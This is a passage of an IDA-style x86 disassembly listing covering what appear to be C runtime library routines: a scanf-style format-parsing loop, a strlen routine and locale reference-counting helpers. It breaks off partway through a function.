loc_4172A4: ; CODE XREF: sub_416F0B+392�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_4172C3
and [ebp+var_48], eax
jmp short loc_4172D2
; ---------------------------------------------------------------------------
loc_4172B3: ; CODE XREF: sub_416F0B+3D0�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4172DD
inc [ebp+var_40]
mov [esi], bl
inc esi
loc_4172C3: ; CODE XREF: sub_416F0B+3A1�j
mov edx, edi
inc [ebp+var_30]
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
loc_4172D2: ; CODE XREF: sub_416F0B+397�j
; sub_416F0B+3A6�j
push ebx
call sub_41C33B
pop ecx
test eax, eax
jnz short loc_4172B3
loc_4172DD: ; CODE XREF: sub_416F0B+361�j
; sub_416F0B+36B�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4172EE
push edi
push ebx
call sub_41C3EE
pop ecx
pop ecx
loc_4172EE: ; CODE XREF: sub_416F0B+3D8�j
cmp [ebp+var_40], 0
jz loc_417978
cmp [ebp+var_4B], 0
jnz loc_4178EC
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_42DE90
add esp, 0Ch
jmp loc_4178EC
; ---------------------------------------------------------------------------
loc_417326: ; CODE XREF: sub_416F0B+22A�j
test ecx, ecx
jnz short loc_417334
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_417334: ; CODE XREF: sub_416F0B+41D�j
; sub_416F0B+44A�j
cmp [ebp+var_4E], 0
jle loc_4174BF
mov [ebp+var_4D], 1
jmp loc_4174BF
; ---------------------------------------------------------------------------
loc_417347: ; CODE XREF: sub_416F0B+21B�j
mov eax, edi
sub eax, 70h
jz loc_4176B6
sub eax, 3
jz short loc_417334
dec eax
dec eax
jz loc_4176BA
sub eax, 3
jz loc_417184
sub eax, 3
jz short loc_417399
loc_41736D: ; CODE XREF: sub_416F0B+239�j
; sub_416F0B+24C�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_28]
jz short loc_417381
loc_417378: ; CODE XREF: sub_416F0B+212�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_417948
; ---------------------------------------------------------------------------
loc_417381: ; CODE XREF: sub_416F0B+46B�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_4178EC
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_4178EC
; ---------------------------------------------------------------------------
loc_417399: ; CODE XREF: sub_416F0B+460�j
cmp [ebp+var_4E], 0
jle short loc_4173A3
mov [ebp+var_4D], 1
loc_4173A3: ; CODE XREF: sub_416F0B+492�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_4173C0
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_4173C0: ; CODE XREF: sub_416F0B+4A8�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_417418
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_417418
; ---------------------------------------------------------------------------
loc_4173E0: ; DATA XREF: .rdata:stru_428E78�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4173E4: ; DATA XREF: .rdata:stru_428E78�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
push 20h
call sub_414E7D
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_417404
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_417978
; ---------------------------------------------------------------------------
loc_417404: ; CODE XREF: sub_416F0B+4EE�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_417418: ; CODE XREF: sub_416F0B+4BA�j
; sub_416F0B+4D3�j
push 20h
push 0
push ebx
call sub_41C550
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_41749F
cmp byte ptr [edi], 5Dh
jnz short loc_41749F
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_4174A2
; ---------------------------------------------------------------------------
loc_417439: ; CODE XREF: sub_416F0B+59B�j
inc edi
cmp al, 2Dh
jnz short loc_417489
test dl, dl
jz short loc_417489
mov cl, [edi]
cmp cl, 5Dh
jz short loc_417489
inc edi
cmp dl, cl
jnb short loc_417452
mov al, cl
jmp short loc_417456
; ---------------------------------------------------------------------------
loc_417452: ; CODE XREF: sub_416F0B+541�j
mov al, dl
mov dl, cl
loc_417456: ; CODE XREF: sub_416F0B+545�j
cmp dl, al
ja short loc_417485
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_41746A: ; CODE XREF: sub_416F0B+578�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_41746A
loc_417485: ; CODE XREF: sub_416F0B+54D�j
xor dl, dl
jmp short loc_4174A2
; ---------------------------------------------------------------------------
loc_417489: ; CODE XREF: sub_416F0B+531�j
; sub_416F0B+535�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_41749F: ; CODE XREF: sub_416F0B+51E�j
; sub_416F0B+523�j
mov dl, [ebp+var_39]
loc_4174A2: ; CODE XREF: sub_416F0B+52C�j
; sub_416F0B+57C�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_417439
test al, al
jz loc_417978
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_4174BC
mov [ebp+arg_4], edi
loc_4174BC: ; CODE XREF: sub_416F0B+5AC�j
mov edi, [ebp+var_68]
loc_4174BF: ; CODE XREF: sub_416F0B+42D�j
; sub_416F0B+437�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_4174D7
push [ebp+arg_0]
push [ebp+var_28]
call sub_41C3EE
pop ecx
pop ecx
loc_4174D7: ; CODE XREF: sub_416F0B+5BD�j
; sub_416F0B+754�j ...
cmp [ebp+var_44], 0
jz short loc_4174EB
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_41767D
loc_4174EB: ; CODE XREF: sub_416F0B+5D0�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416EF5
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_41766A
cmp edi, 63h
jz short loc_41754B
cmp edi, 73h
jnz short loc_41751B
cmp eax, 9
jl short loc_417516
cmp eax, 0Dh
jle short loc_41751B
loc_417516: ; CODE XREF: sub_416F0B+604�j
cmp eax, 20h
jnz short loc_41754B
loc_41751B: ; CODE XREF: sub_416F0B+5FF�j
; sub_416F0B+609�j
cmp edi, 7Bh
jnz loc_41766A
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_41766A
mov edi, [ebp+var_68]
loc_41754B: ; CODE XREF: sub_416F0B+5FA�j
; sub_416F0B+60E�j
cmp [ebp+var_4B], 0
jnz loc_417664
cmp [ebp+var_4D], 0
jz loc_417659
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_42DEA0
test byte ptr [ecx+eax*2+1], 80h
jz short loc_417586
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416EF5
mov [ebp+var_1D3], al
loc_417586: ; CODE XREF: sub_416F0B+668�j
push dword_42E0F4
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_41C51A
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_41765C
; ---------------------------------------------------------------------------
loc_4175B3: ; CODE XREF: sub_416F0B+27F�j
cmp ebx, 2Bh
jnz short loc_4175D6
loc_4175B8: ; CODE XREF: sub_416F0B+289�j
dec [ebp+var_48]
jnz short loc_4175C7
test ecx, ecx
jz short loc_4175C7
mov [ebp+var_4C], 1
jmp short loc_4175D6
; ---------------------------------------------------------------------------
loc_4175C7: ; CODE XREF: sub_416F0B+6B0�j
; sub_416F0B+6B4�j
inc [ebp+var_30]
mov edx, esi
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
loc_4175D6: ; CODE XREF: sub_416F0B+6AB�j
; sub_416F0B+6BA�j
cmp ebx, 30h
jnz loc_4176EB
inc [ebp+var_30]
mov edx, esi
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_417633
cmp bl, 58h
jz short loc_417633
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_41761A
cmp [ebp+var_44], 0
jz short loc_417612
dec [ebp+var_48]
jnz short loc_417612
inc [ebp+var_4C]
loc_417612: ; CODE XREF: sub_416F0B+6FD�j
; sub_416F0B+702�j
push 6Fh
loc_417614: ; CODE XREF: sub_416F0B+74C�j
pop edi
jmp loc_4176EB
; ---------------------------------------------------------------------------
loc_41761A: ; CODE XREF: sub_416F0B+6F7�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_41762B
push esi
push ebx
call sub_41C3EE
pop ecx
pop ecx
loc_41762B: ; CODE XREF: sub_416F0B+715�j
push 30h
pop ebx
jmp loc_4176E8
; ---------------------------------------------------------------------------
loc_417633: ; CODE XREF: sub_416F0B+6E6�j
; sub_416F0B+6EB�j
inc [ebp+var_30]
mov edx, esi
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_417655
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_417655
inc [ebp+var_4C]
loc_417655: ; CODE XREF: sub_416F0B+73B�j
; sub_416F0B+745�j
push 78h
jmp short loc_417614
; ---------------------------------------------------------------------------
loc_417659: ; CODE XREF: sub_416F0B+64E�j
mov [ebx], al
inc ebx
loc_41765C: ; CODE XREF: sub_416F0B+6A3�j
mov [ebp+var_64], ebx
jmp loc_4174D7
; ---------------------------------------------------------------------------
loc_417664: ; CODE XREF: sub_416F0B+644�j
inc esi
jmp loc_4174D7
; ---------------------------------------------------------------------------
loc_41766A: ; CODE XREF: sub_416F0B+5F1�j
; sub_416F0B+613�j ...
dec [ebp+var_30]
cmp eax, 0FFFFFFFFh
jz short loc_41767D
push [ebp+arg_0]
push eax
call sub_41C3EE
pop ecx
pop ecx
loc_41767D: ; CODE XREF: sub_416F0B+5DA�j
; sub_416F0B+765�j
cmp esi, ebx
jz loc_417978
cmp [ebp+var_4B], 0
jnz loc_4178EC
inc [ebp+var_34]
cmp [ebp+var_68], 63h
jz loc_4178EC
mov eax, [ebp+var_64]
cmp [ebp+var_4D], 0
jz short loc_4176AE
and word ptr [eax], 0
jmp loc_4178EC
; ---------------------------------------------------------------------------
loc_4176AE: ; CODE XREF: sub_416F0B+798�j
and byte ptr [eax], 0
jmp loc_4178EC
; ---------------------------------------------------------------------------
loc_4176B6: ; CODE XREF: sub_416F0B+441�j
mov [ebp+var_4F], 1
loc_4176BA: ; CODE XREF: sub_416F0B+221�j
; sub_416F0B+233�j ...
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4176C8
mov [ebp+var_4A], 1
jmp short loc_4176CD
; ---------------------------------------------------------------------------
loc_4176C8: ; CODE XREF: sub_416F0B+7B5�j
cmp ebx, 2Bh
jnz short loc_4176EB
loc_4176CD: ; CODE XREF: sub_416F0B+7BB�j
dec [ebp+var_48]
jnz short loc_4176DC
test ecx, ecx
jz short loc_4176DC
mov [ebp+var_4C], 1
jmp short loc_4176EB
; ---------------------------------------------------------------------------
loc_4176DC: ; CODE XREF: sub_416F0B+7C5�j
; sub_416F0B+7C9�j
inc [ebp+var_30]
mov edx, esi
call sub_416EF5
mov ebx, eax
loc_4176E8: ; CODE XREF: sub_416F0B+723�j
mov [ebp+var_28], ebx
loc_4176EB: ; CODE XREF: sub_416F0B+6CE�j
; sub_416F0B+70A�j ...
cmp [ebp+var_54], 0
jz loc_4177F0
cmp [ebp+var_4C], 0
jnz loc_4177CE
loc_4176FF: ; CODE XREF: sub_416F0B+8BA�j
cmp edi, 78h
jz short loc_41774A
cmp edi, 70h
jz short loc_41774A
push ebx
call sub_41C33B
pop ecx
test eax, eax
jz short loc_41777B
cmp edi, 6Fh
jnz short loc_417733
cmp ebx, 38h
jge short loc_41777B
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 3
shl eax, 3
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp short loc_41777E
; ---------------------------------------------------------------------------
loc_417733: ; CODE XREF: sub_416F0B+80C�j
push 0
push 0Ah
push [ebp+var_58]
push [ebp+var_5C]
call sub_414E90
mov [ebp+var_5C], eax
mov [ebp+var_58], edx
jmp short loc_41777E
; ---------------------------------------------------------------------------
loc_41774A: ; CODE XREF: sub_416F0B+7F7�j
; sub_416F0B+7FC�j
push ebx
call sub_41C375
pop ecx
test eax, eax
jz short loc_41777B
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_58]
shld ecx, eax, 4
shl eax, 4
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
push ebx
call sub_41C33B
pop ecx
test eax, eax
jnz short loc_41777E
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_41777E
; ---------------------------------------------------------------------------
loc_41777B: ; CODE XREF: sub_416F0B+807�j
; sub_416F0B+811�j ...
inc [ebp+var_4C]
loc_41777E: ; CODE XREF: sub_416F0B+826�j
; sub_416F0B+83D�j ...
cmp [ebp+var_4C], 0
jnz short loc_4177B0
inc [ebp+var_40]
lea eax, [ebx-30h]
cdq
add [ebp+var_5C], eax
adc [ebp+var_58], edx
cmp [ebp+var_44], 0
jz short loc_4177A2
dec [ebp+var_48]
jnz short loc_4177A2
mov [ebp+var_4C], 1
jmp short loc_4177C1
; ---------------------------------------------------------------------------
loc_4177A2: ; CODE XREF: sub_416F0B+88A�j
; sub_416F0B+88F�j
inc [ebp+var_30]
mov edx, esi
call sub_416EF5
mov ebx, eax
jmp short loc_4177C1
; ---------------------------------------------------------------------------
loc_4177B0: ; CODE XREF: sub_416F0B+877�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4177C1
push esi
push ebx
call sub_41C3EE
pop ecx
pop ecx
loc_4177C1: ; CODE XREF: sub_416F0B+895�j
; sub_416F0B+8A3�j ...
cmp [ebp+var_4C], 0
jz loc_4176FF
mov [ebp+var_28], ebx
loc_4177CE: ; CODE XREF: sub_416F0B+7EE�j
cmp [ebp+var_4A], 0
jz loc_4178AA
mov eax, [ebp+var_5C]
neg eax
mov ecx, [ebp+var_58]
adc ecx, 0
neg ecx
mov [ebp+var_5C], eax
mov [ebp+var_58], ecx
jmp loc_4178AA
; ---------------------------------------------------------------------------
loc_4177F0: ; CODE XREF: sub_416F0B+7E4�j
cmp [ebp+var_4C], 0
jnz loc_4178A1
loc_4177FA: ; CODE XREF: sub_416F0B+98D�j
cmp edi, 78h
jz short loc_41782C
cmp edi, 70h
jz short loc_41782C
push ebx
call sub_41C33B
pop ecx
test eax, eax
jz short loc_41784E
cmp edi, 6Fh
jnz short loc_41781F
cmp ebx, 38h
jge short loc_41784E
shl [ebp+var_38], 3
jmp short loc_417851
; ---------------------------------------------------------------------------
loc_41781F: ; CODE XREF: sub_416F0B+907�j
mov eax, [ebp+var_38]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp+var_38], eax
jmp short loc_417851
; ---------------------------------------------------------------------------
loc_41782C: ; CODE XREF: sub_416F0B+8F2�j
; sub_416F0B+8F7�j
push ebx
call sub_41C375
pop ecx
test eax, eax
jz short loc_41784E
shl [ebp+var_38], 4
push ebx
call sub_41C33B
pop ecx
test eax, eax
jnz short loc_417851
and ebx, 0FFFFFFDFh
sub ebx, 7
jmp short loc_417851
; ---------------------------------------------------------------------------
loc_41784E: ; CODE XREF: sub_416F0B+902�j
; sub_416F0B+90C�j ...
inc [ebp+var_4C]
loc_417851: ; CODE XREF: sub_416F0B+912�j
; sub_416F0B+91F�j ...
cmp [ebp+var_4C], 0
jnz short loc_417883
inc [ebp+var_40]
mov eax, [ebp+var_38]
lea eax, [eax+ebx-30h]
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_417875
dec [ebp+var_48]
jnz short loc_417875
mov [ebp+var_4C], 1
jmp short loc_417894
; ---------------------------------------------------------------------------
loc_417875: ; CODE XREF: sub_416F0B+95D�j
; sub_416F0B+962�j
inc [ebp+var_30]
mov edx, esi
call sub_416EF5
mov ebx, eax
jmp short loc_417894
; ---------------------------------------------------------------------------
loc_417883: ; CODE XREF: sub_416F0B+94A�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_417894
push esi
push ebx
call sub_41C3EE
pop ecx
pop ecx
loc_417894: ; CODE XREF: sub_416F0B+968�j
; sub_416F0B+976�j ...
cmp [ebp+var_4C], 0
jz loc_4177FA
mov [ebp+var_28], ebx
loc_4178A1: ; CODE XREF: sub_416F0B+8E9�j
cmp [ebp+var_4A], 0
jz short loc_4178AA
neg [ebp+var_38]
loc_4178AA: ; CODE XREF: sub_416F0B+8C7�j
; sub_416F0B+8E0�j ...
cmp edi, 46h
jnz short loc_4178B3
and [ebp+var_40], 0
loc_4178B3: ; CODE XREF: sub_416F0B+9A2�j
cmp [ebp+var_40], 0
jz loc_417978
cmp [ebp+var_4B], 0
jnz short loc_4178EC
inc [ebp+var_34]
mov ebx, [ebp+var_64]
mov eax, [ebp+var_38]
loc_4178CC: ; CODE XREF: sub_416F0B+259�j
cmp [ebp+var_54], 0
jz short loc_4178DF
mov eax, [ebp+var_5C]
mov [ebx], eax
mov eax, [ebp+var_58]
mov [ebx+4], eax
jmp short loc_4178EC
; ---------------------------------------------------------------------------
loc_4178DF: ; CODE XREF: sub_416F0B+9C5�j
cmp [ebp+var_4F], 0
jz short loc_4178E9
mov [ebx], eax
jmp short loc_4178EC
; ---------------------------------------------------------------------------
loc_4178E9: ; CODE XREF: sub_416F0B+9D8�j
mov [ebx], ax
loc_4178EC: ; CODE XREF: sub_416F0B+25F�j
; sub_416F0B+3F1�j ...
inc [ebp+var_29]
inc [ebp+arg_4]
jmp short loc_41795C
; ---------------------------------------------------------------------------
loc_4178F4: ; CODE XREF: sub_416F0B+90�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416EF5
mov ebx, eax
mov [ebp+var_28], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp eax, ebx
jnz short loc_417945
movzx eax, bl
mov ecx, off_42DEA0
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41795C
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416EF5
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+arg_4], esi
cmp ecx, eax
jz short loc_417959
cmp eax, 0FFFFFFFFh
jz short loc_417945
push [ebp+arg_0]
push eax
call sub_41C3EE
pop ecx
pop ecx
loc_417945: ; CODE XREF: sub_416F0B+A02�j
; sub_416F0B+A2D�j
cmp ebx, 0FFFFFFFFh
loc_417948: ; CODE XREF: sub_416F0B+471�j
jz short loc_417978
push [ebp+arg_0]
push [ebp+var_28]
call sub_41C3EE
pop ecx
pop ecx
jmp short loc_417978
; ---------------------------------------------------------------------------
loc_417959: ; CODE XREF: sub_416F0B+A28�j
dec [ebp+var_30]
loc_41795C: ; CODE XREF: sub_416F0B+9E7�j
; sub_416F0B+A12�j
cmp [ebp+var_28], 0FFFFFFFFh
jnz loc_416F39
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 25h
jnz short loc_417978
cmp byte ptr [eax+1], 6Eh
jz loc_416F39
loc_417978: ; CODE XREF: sub_416F0B+35�j
; sub_416F0B+3E7�j ...
cmp [ebp+var_24], 1
jnz short loc_417987
push [ebp+var_20]
call sub_414A14
pop ecx
loc_417987: ; CODE XREF: sub_416F0B+A71�j
mov eax, [ebp+var_34]
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_41799C
test eax, eax
jnz short loc_41799C
cmp [ebp+var_29], al
jnz short loc_41799C
or eax, 0FFFFFFFFh
loc_41799C: ; CODE XREF: sub_416F0B+A83�j
; sub_416F0B+A87�j ...
lea esp, [ebp-1E4h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_41A1F6
call __SEH_epilog
retn
sub_416F0B endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4179C0 proc near ; CODE XREF: sub_4147C3+17�p
; sub_415B64+D2�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4179F0
loc_4179CC: ; CODE XREF: sub_4179C0+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_417A23
test ecx, 3
jnz short loc_4179CC
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_4179F0: ; CODE XREF: sub_4179C0+A�j
; sub_4179C0+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4179F0
mov eax, [ecx-4]
test al, al
jz short loc_417A41
test ah, ah
jz short loc_417A37
test eax, 0FF0000h
jz short loc_417A2D
test eax, 0FF000000h
jz short loc_417A23
jmp short loc_4179F0
; ---------------------------------------------------------------------------
loc_417A23: ; CODE XREF: sub_4179C0+13�j
; sub_4179C0+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417A2D: ; CODE XREF: sub_4179C0+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417A37: ; CODE XREF: sub_4179C0+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_417A41: ; CODE XREF: sub_4179C0+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4179C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A4B proc near ; CODE XREF: sub_4148EA+2A�p
; sub_41524A+37�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
cmp ecx, 100h
mov ecx, [ebp+arg_0]
ja short loc_417A69
mov ecx, [ecx+48h]
movzx eax, word ptr [ecx+eax*2]
jmp short loc_417ABD
; ---------------------------------------------------------------------------
loc_417A69: ; CODE XREF: sub_417A4B+13�j
push esi
mov edx, eax
sar edx, 8
push edi
mov edi, [ecx+48h]
movzx esi, dl
test byte ptr [edi+esi*2+1], 80h
pop edi
pop esi
jz short loc_417A8E
and [ebp+var_2], 0
push 2
mov [ebp+var_3], al
mov [ebp+var_4], dl
pop eax
jmp short loc_417A98
; ---------------------------------------------------------------------------
loc_417A8E: ; CODE XREF: sub_417A4B+32�j
and [ebp+var_3], 0
mov [ebp+var_4], al
xor eax, eax
inc eax
loc_417A98: ; CODE XREF: sub_417A4B+41�j
push 1
push dword ptr [ecx+14h]
push dword ptr [ecx+4]
lea ecx, [ebp+arg_4+2]
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41C5B0
add esp, 1Ch
test eax, eax
jnz short loc_417AB9
leave
retn
; ---------------------------------------------------------------------------
loc_417AB9: ; CODE XREF: sub_417A4B+6A�j
movzx eax, word ptr [ebp+arg_4+2]
loc_417ABD: ; CODE XREF: sub_417A4B+1C�j
and eax, [ebp+arg_8]
leave
retn
sub_417A4B endp
; =============== S U B R O U T I N E =======================================
sub_417AC2 proc near ; CODE XREF: sub_417B8C+B7�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+3Ch]
push edi
xor edi, edi
cmp eax, dword_47C490
jz short loc_417B38
cmp eax, edi
jz short loc_417B38
mov eax, [esi+2Ch]
cmp [eax], edi
jnz short loc_417B38
mov eax, [esi+34h]
cmp eax, edi
jz short loc_417B03
cmp [eax], edi
jnz short loc_417B03
cmp eax, dword_47C610
jz short loc_417B03
push eax
call sub_414A14
push dword ptr [esi+3Ch]
call sub_41C959
pop ecx
pop ecx
loc_417B03: ; CODE XREF: sub_417AC2+23�j
; sub_417AC2+27�j ...
mov eax, [esi+30h]
cmp eax, edi
jz short loc_417B26
cmp [eax], edi
jnz short loc_417B26
cmp eax, dword_47C614
jz short loc_417B26
push eax
call sub_414A14
push dword ptr [esi+3Ch]
call sub_41C8FA
pop ecx
pop ecx
loc_417B26: ; CODE XREF: sub_417AC2+46�j
; sub_417AC2+4A�j ...
push dword ptr [esi+2Ch]
call sub_414A14
push dword ptr [esi+3Ch]
call sub_414A14
pop ecx
pop ecx
loc_417B38: ; CODE XREF: sub_417AC2+11�j
; sub_417AC2+15�j ...
mov eax, [esi+40h]
cmp eax, dword_47C60C
jz short loc_417B5B
cmp eax, edi
jz short loc_417B5B
cmp [eax], edi
jnz short loc_417B5B
push eax
call sub_414A14
push dword ptr [esi+44h]
call sub_414A14
pop ecx
pop ecx
loc_417B5B: ; CODE XREF: sub_417AC2+7F�j
; sub_417AC2+83�j ...
mov eax, [esi+50h]
cmp eax, dword_47C48C
jz short loc_417B82
cmp eax, edi
jz short loc_417B82
cmp [eax+0B4h], edi
jnz short loc_417B82
push eax
call sub_41C76A
push dword ptr [esi+50h]
call sub_414A14
pop ecx
pop ecx
loc_417B82: ; CODE XREF: sub_417AC2+A2�j
; sub_417AC2+A6�j ...
push esi
call sub_414A14
pop ecx
pop edi
pop esi
retn
sub_417AC2 endp
; =============== S U B R O U T I N E =======================================
sub_417B8C proc near ; CODE XREF: sub_417C4E+18�p
push esi
call sub_416E15
mov esi, eax
mov eax, [esi+64h]
cmp eax, off_42D83C
jz loc_417C49
test eax, eax
jz short loc_417BD6
mov ecx, [eax+2Ch]
dec dword ptr [eax]
test ecx, ecx
jz short loc_417BB2
dec dword ptr [ecx]
loc_417BB2: ; CODE XREF: sub_417B8C+22�j
mov ecx, [eax+34h]
test ecx, ecx
jz short loc_417BBB
dec dword ptr [ecx]
loc_417BBB: ; CODE XREF: sub_417B8C+2B�j
mov ecx, [eax+30h]
test ecx, ecx
jz short loc_417BC4
dec dword ptr [ecx]
loc_417BC4: ; CODE XREF: sub_417B8C+34�j
mov ecx, [eax+40h]
test ecx, ecx
jz short loc_417BCD
dec dword ptr [ecx]
loc_417BCD: ; CODE XREF: sub_417B8C+3D�j
mov ecx, [eax+4Ch]
dec dword ptr [ecx+0B4h]
loc_417BD6: ; CODE XREF: sub_417B8C+19�j
mov ecx, off_42D83C
mov [esi+64h], ecx
mov ecx, off_42D83C
inc dword ptr [ecx]
mov ecx, off_42D83C
mov ecx, [ecx+2Ch]
test ecx, ecx
jz short loc_417BF6
inc dword ptr [ecx]
loc_417BF6: ; CODE XREF: sub_417B8C+66�j
mov ecx, off_42D83C
mov ecx, [ecx+34h]
test ecx, ecx
jz short loc_417C05
inc dword ptr [ecx]
loc_417C05: ; CODE XREF: sub_417B8C+75�j
mov ecx, off_42D83C
mov ecx, [ecx+30h]
test ecx, ecx
jz short loc_417C14
inc dword ptr [ecx]
loc_417C14: ; CODE XREF: sub_417B8C+84�j
mov ecx, off_42D83C
mov ecx, [ecx+40h]
test ecx, ecx
jz short loc_417C23
inc dword ptr [ecx]
loc_417C23: ; CODE XREF: sub_417B8C+93�j
mov ecx, off_42D83C
mov ecx, [ecx+4Ch]
inc dword ptr [ecx+0B4h]
test eax, eax
jz short loc_417C49
cmp dword ptr [eax], 0
jnz short loc_417C49
cmp eax, offset dword_42D7E8
jz short loc_417C49
push eax
call sub_417AC2
pop ecx
loc_417C49: ; CODE XREF: sub_417B8C+11�j
; sub_417B8C+A8�j ...
mov eax, [esi+64h]
pop esi
retn
sub_417B8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C4E proc near ; CODE XREF: sub_4148EA+12�p
; sub_415136+24�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_429008
call __SEH_prolog
push 0Ch
call sub_418285
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_417B8C
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417C80
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_417C4E endp
; =============== S U B R O U T I N E =======================================
sub_417C80 proc near ; CODE XREF: sub_417C4E+24�p
; DATA XREF: .rdata:stru_429008�o
push 0Ch
call sub_4181F1
pop ecx
retn
sub_417C80 endp
; =============== S U B R O U T I N E =======================================
sub_417C89 proc near ; CODE XREF: sub_417D0C+4C�p
; sub_41D55D+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_41CD1B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_417CD7
